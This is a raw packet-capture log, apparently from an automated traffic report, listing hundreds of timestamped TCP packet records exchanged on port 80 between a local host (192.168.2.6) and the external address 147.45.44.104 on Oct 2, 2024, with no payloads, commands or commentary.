                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142642021 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142642021 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142653942 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142653942 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142667055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142677069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142680883 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142687082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142698050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142704010 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142708063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142718077 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142720938 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142734051 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142745018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142750978 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142755985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142766953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142777920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142779112 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142792940 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142803907 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142806053 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142815113 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142824888 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142832041 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142836094 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142851114 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142860889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142873049 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142874002 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142899036 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142911911 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143172979 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143292904 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143408060 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143413067 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143448114 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143480062 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143512011 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143536091 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143543005 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143556118 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143574953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143608093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143657923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143678904 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143688917 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143699884 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143721104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143769979 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143773079 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143802881 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143835068 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143852949 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143871069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143913031 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143917084 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143949986 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.143981934 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144015074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144025087 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144048929 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144069910 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144084930 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144097090 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144128084 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144144058 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144160032 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144170046 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144205093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144215107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144232035 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144258976 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144272089 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144280910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144285917 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144313097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144325972 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144352913 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144383907 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144418955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144423008 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144458055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144469976 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144491911 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144501925 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144505024 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144535065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144566059 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.144612074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175218105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175236940 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175246000 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175271034 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175292969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175297022 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175353050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175364017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175394058 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175447941 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175460100 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.175494909 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231744051 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231762886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231774092 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231807947 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231898069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231909037 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231919050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231930971 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231940985 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.231959105 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232036114 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232045889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232054949 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232065916 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232075930 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232080936 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232086897 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232108116 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232228994 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232239008 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232249975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232259989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232270002 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232270002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232281923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232292891 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232294083 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232316971 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232340097 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232353926 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232362986 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232392073 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232506037 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232517004 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232527018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232537985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232547045 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232547998 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232567072 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232573986 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232582092 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232582092 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232588053 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232599020 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232623100 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232708931 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232719898 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232738972 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232928038 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232939005 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232949018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232961893 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232973099 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232973099 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232989073 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232990980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232996941 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.232997894 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233000994 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233006954 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233012915 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233016968 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233022928 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233025074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233028889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233042002 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233069897 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233387947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233398914 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233408928 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233423948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233429909 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233434916 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233443022 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233444929 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233463049 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233464956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233468056 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233472109 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233474970 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233480930 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233486891 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233490944 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233493090 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233494997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233513117 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233527899 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233664989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233675003 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233714104 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233781099 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233792067 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233802080 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233812094 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233812094 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233823061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233838081 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233838081 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233844042 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233861923 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.233882904 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234050989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234062910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234072924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234092951 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234216928 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234232903 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234242916 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234250069 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234252930 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234262943 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234267950 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234273911 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234283924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234292984 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234294891 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234304905 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234309912 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234314919 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234324932 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234334946 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234344006 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234354019 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234354973 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234364986 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234375000 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234380960 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234385967 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234396935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234400034 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234409094 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234414101 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234447002 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234946966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234956980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234966993 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234977007 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234987020 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234991074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.234997988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235008001 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235018015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235018015 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235028982 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235034943 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235038996 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235049963 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235059977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235063076 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235069990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235078096 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235080004 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235096931 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.235115051 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.265947104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.265985012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.265996933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.266026974 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.266041994 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.266067982 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.266097069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.266108036 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.266118050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.266134024 CEST4971180192.168.2.6147.45.44.104
